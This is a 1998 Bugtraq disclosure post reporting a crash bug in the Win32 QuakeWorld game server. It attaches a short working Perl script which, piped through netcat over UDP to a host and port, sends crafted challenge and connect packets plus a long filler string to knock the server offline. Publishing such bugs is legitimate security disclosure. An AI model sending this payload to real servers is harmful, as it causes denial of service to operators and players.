[8416] in bugtraq
quakeworld/win32 DoS
daemon@ATHENA.MIT.EDU (Paul Boehm)
Wed Nov 4 22:01:42 1998
Date: Wed, 4 Nov 1998 16:30:18 +0100
Reply-To: Paul Boehm <pb@INSECURITY.NET>
From: Paul Boehm <pb@INSECURITY.NET>
To: BUGTRAQ@NETSPACE.ORG
--4Ckj6UjgE2iN1+kY
Content-Type: text/plain; charset=us-ascii
the output of the attached perl script, when piped through netcat,
crashes quakeworld for win32. As i don't have any win32 debuging
tools and the problem doesn't occur under linux i can't further
investigate this. Zoid (idsoftware) has been mailed some weeks ago,
but he didn't look very interested...
cya,
paul
--
.----------------------------------------------------------------------.
| mail: pb@insecurity.net :: url: http://paul.boehm.org |
| irc: infected :: pgp: finger pb@insecurity.net | pgp -fka |
\.....Linux is like a wigwam - no windows, no gates, apache inside..../
--4Ckj6UjgE2iN1+kY
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=qwcrash
#!/usr/bin/perl
# qwsvwin32-crasher by infected@cia.at
#
# usage : ./qwcrash | nc -u host port
# result: qwsv for win32 should exit with: ERROR: NET_GetPacket: Unknown error
# reason: ? (winsock?)
#
#
print chr(255) x 4 . "getchallenge\n";
print chr(255) x 4 . 'connect 28 26914 1960732995 "\noaim\0\msg\1\rate\2500\team\bla\topcolor\3\bottomcolor\11\skin\bla\pmodel\33168\emodel\6967\name\bla"' . "\n";
print "x" x 4400;
--4Ckj6UjgE2iN1+kY--
